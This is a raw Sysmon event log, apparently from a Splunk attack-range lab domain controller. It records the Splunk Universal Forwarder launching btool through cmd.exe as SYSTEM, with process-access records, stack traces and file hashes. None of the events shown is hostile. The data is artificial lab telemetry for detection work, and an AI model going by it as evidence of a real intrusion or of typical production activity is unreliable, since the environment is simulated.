Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C74-5FA1-4300-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4300-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4300-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.613{D28789B6-7C74-5FA1-4200-000000008801}40204024C:\Windows\system32\cmd.exe{D28789B6-7C74-5FA1-4300-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.614{D28789B6-7C74-5FA1-4300-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C74-5FA1-4200-000000008801}4020C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4200-000000008801}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4200-000000008801}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C74-5FA1-4100-000000008801}40004004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C74-5FA1-4200-000000008801}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.608{D28789B6-7C74-5FA1-4200-000000008801}4020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.597{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4100-000000008801}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 